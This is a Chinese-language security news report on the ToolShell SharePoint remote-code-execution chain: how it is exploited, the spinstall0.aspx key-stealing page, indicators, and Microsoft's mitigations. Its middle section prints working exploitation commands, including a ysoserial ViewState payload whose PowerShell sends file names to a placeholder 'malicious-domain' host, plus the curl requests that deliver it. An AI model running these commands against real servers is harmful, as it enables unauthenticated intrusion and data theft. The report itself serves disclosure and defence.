圖片來源：CODE WHITE GmbH

2025年7月18日晚間，Eye Security安全團隊發現一起大規模利用新型Microsoft SharePoint遠程代碼執行（RCE）漏洞鏈的攻擊活動，該漏洞鏈被命名為ToolShell。攻擊者通過組合利用CVE-2025-49704和CVE-2025-49706兩個漏洞，可在無需認證的情況下完全控制本地部署的SharePoint服務器。

"這并非憑證泄露問題，而是已被武器化的Pwn2Own漏洞利用代碼在野利用"，Eye Security特別強調。

漏洞技術細節

ToolShell攻擊鏈包含兩個關鍵漏洞：

• CVE-2025-49706（CVSS 6.3）：SharePoint服務器欺騙漏洞
• CVE-2025-49704（CVSS 8.8）：通過ToolPane端點觸發的SharePoint RCE漏洞

初步分析認為攻擊需要有效憑證，但深入調查顯示實際無需任何認證。報告指出："對/_layouts/15/ToolPane.aspx的POST請求特征非常明顯...我們確信攻擊全程未使用任何憑證"。

攻擊手法分析

攻擊基于Code White GmbH曾在Pwn2Own上演示的概念驗證代碼，現已被完全武器化。成功利用后，攻擊者可直接植入隱蔽的ASPX惡意負載而無需登錄。已觀測到的惡意文件spinstall0.aspx疑似基于Sharpyshell開發，其設計目的并非直接執行命令，而是竊取加密機器密鑰。

"這不是典型的網頁后門...該頁面通過調用.NET內部方法讀取SharePoint服務器的MachineKey配置"，研究人員解釋。這些密鑰（如ValidationKey和DecryptionKey）用于生成有效的__VIEWSTATE令牌——這是ASP.NET的核心安全機制。獲取密鑰后，攻擊者可使用ysoserial等工具簽署惡意負載實現完全遠程代碼執行。

# 通過任意公開SharePoint頁面獲取<VIEWSTATE_GENERATOR>
curl -s https://target/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="\K[^"]+'

# 生成viewstate攻擊負載示例
ysoserial.exe -p ViewState -g TypeConfuseDelegate \
-c "powershell -nop -c \"dir 'C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\TEMPLATE\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://malicious-domain/?f=' + [uri]::EscapeDataString($_.Name)) }\"" \
--generator="<VIEWSTATE_GENERATOR>" \
--validationkey="<VALIDATION_KEY>" \
--validationalg="<VALIDATION_ALG>" \
--islegacy \
--minify

# 將生成的令牌附加至請求即可執行命令(RCE)
curl http://target/_layouts/15/success.aspx?__VIEWSTATE=<YSOSERIAL_GENERATED_PAYLOAD>

"這些負載可嵌入任意惡意命令，并被服務器視為可信輸入，最終在無需憑證的情況下完成RCE攻擊鏈"，報告補充道。

影響范圍與響應措施

Eye Security掃描了8,000余臺暴露在公網的SharePoint服務器，發現數十臺已遭入侵。通過分析160字節的獨特響應特征和spinstall0.aspx端點可識別受影響系統。

截至7月19日，Palo Alto Networks Unit 42確認攻擊仍在持續，觀測到攻擊者：

• 通過PowerShell投放惡意ASPX負載
• 竊取機器密鑰建立持久化訪問
• 從可疑IP（如96[.]9[.]125[.]147）執行攻擊模塊

微軟已發布緊急補丁和安全指南，建議本地部署SharePoint的用戶立即采取以下措施：

• 安裝7月補丁星期二發布的最新SharePoint更新
• 掃描入侵痕跡，重點檢查/ToolPane.aspx和/spinstall0.aspx路徑
• 檢查加密密鑰是否泄露，如已失竊需立即重新生成
• 監控HTTP(S)外聯連接和反向Shell活動